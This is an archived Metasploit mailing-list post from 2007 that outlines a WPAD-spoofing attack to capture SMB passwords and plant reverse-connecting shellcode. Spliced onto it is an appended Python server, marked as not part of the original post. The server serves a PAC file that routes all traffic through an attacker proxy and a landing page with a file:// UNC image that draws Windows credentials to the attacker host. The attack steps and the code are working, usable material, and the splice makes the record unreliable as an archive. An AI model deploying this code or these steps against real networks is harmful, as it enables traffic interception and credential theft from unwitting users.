Metasploit mailing list archives

Defcon 15 Speech - Trying to *borrow* the demo


From: angelisonline at gmail.com (Mr Gabriel)
Date: Sat, 22 Sep 2007 13:04:25 +0100

Hey guys, I've been watching the speech that HDM and Valsmith gave
at Defcon, and I want to try and emulate the demo they did at the
end. I know HDM and Val are probably reading this email anyway, so a
quick message to them - I'm not trying to steal your demo... okay,
well I am, it was just such a powerful demo, you guys made it seem so
easy to own an entire network.


Okay, what I've got so far is this.

Preparation:
Running, working SOCKS service
Running, working Apache service
Running, working Squid service, with transparent proxying



Step One:- Inject DNS name WPAD

Step Two:- Redirect them to your own spoofed site, regardless of what
website they try to go to.
The aim is to get them to create an SMB connection back to you.

Step Three:- Get them to provide you with their password for
connecting to shares

Step Four:- Using that same password, connect back to them, and
upload your shellcode

Step Five:- When the shellcode runs, it should connect back to you,
giving you remote access to the entire system.



Feel free to correct my mistakes, and stuff like that - add extra
techie details, laugh at my stupidity, whatever! So long as we end
up with a working writeup that we could maybe all take to work and
land a few more clients :)
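The "Apache + spoofed site" half of Steps One and Two, written out as an added example (this is not code from the original post, nor from HDM's or Valsmith's demo). It assumes the attacker box is reachable as the hypothetical address 10.0.0.5, that Squid listens on 3128 as in the preparation list above, and that once the name wpad resolves to that box the clients will fetch /wpad.dat from it. The PAC script returns the same PROXY directive for every URL, which is what makes "regardless of what website they try to go to" work, and every other request gets a landing page whose image is a UNC path on the attacker host, which is what prompts a Windows client to open the SMB connection Step Three relies on.

```python
"""Added example: a stand-in for the Apache side of the outline above.

Hypothetical values chosen for this example:
  * ATTACKER_HOST - the box the victims resolve 'wpad' to;
  * PROXY_PORT    - the Squid port from the preparation list;
  * /wpad.dat     - the path WPAD clients request for the PAC file.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Tuple

ATTACKER_HOST = "10.0.0.5"   # hypothetical attacker address
PROXY_PORT = 3128            # hypothetical Squid port
HTTP_PORT = 80

PAC_MIME = "application/x-ns-proxy-autoconfig"


def build_pac(proxy_host: str, proxy_port: int) -> str:
    """Return a proxy auto-config script that routes every URL through proxy_host.

    WPAD clients fetch http://wpad/wpad.dat and call FindProxyForURL() for each
    request; returning one PROXY directive unconditionally sends all traffic to
    the attacker's proxy, whatever site the user typed.
    """
    return (
        "function FindProxyForURL(url, host) {\n"
        f'    return "PROXY {proxy_host}:{proxy_port}";\n'
        "}\n"
    )


def build_landing_page(smb_host: str, share: str = "share", image: str = "logo.gif") -> str:
    """Return an HTML page whose image lives on a share of smb_host.

    A browser that follows file:// references from an http: page resolves the
    UNC path over SMB and, during session setup, offers the user's credentials
    to smb_host (hypothetical share and image names).
    """
    unc = f"\\\\{smb_host}\\{share}\\{image}"
    return (
        "<html><body>\n"
        "<p>Loading...</p>\n"
        f'<img src="file://{smb_host}/{share}/{image}" alt="">\n'
        f"<!-- UNC form of the same reference: {unc} -->\n"
        "</body></html>\n"
    )


def route(path: str) -> Tuple[int, str, str]:
    """Routing decision kept separate from the socket code so it can be tested.

    The Host header is deliberately ignored: whichever site the victim asked
    for, the answer is either the PAC file or the landing page.
    """
    if path.split("?", 1)[0] == "/wpad.dat":
        return 200, PAC_MIME, build_pac(ATTACKER_HOST, PROXY_PORT)
    return 200, "text/html", build_landing_page(ATTACKER_HOST)


class SpoofHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, ctype, body = route(self.path)
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, fmt, *args):
        # Show which site the victim actually asked for, to confirm the redirect works.
        print(f"{self.client_address[0]} asked for {self.headers.get('Host')}{self.path}")


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", HTTP_PORT), SpoofHandler).serve_forever()
```

Whether the client actually follows the file:// image reference depends on the browser: Internet Explorer of that era did, while Firefox refuses to load file: URLs from an http: page, so the landing page alone is not enough for every client. The SMB listener that collects the credentials in Step Three is a separate component and is not shown here.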



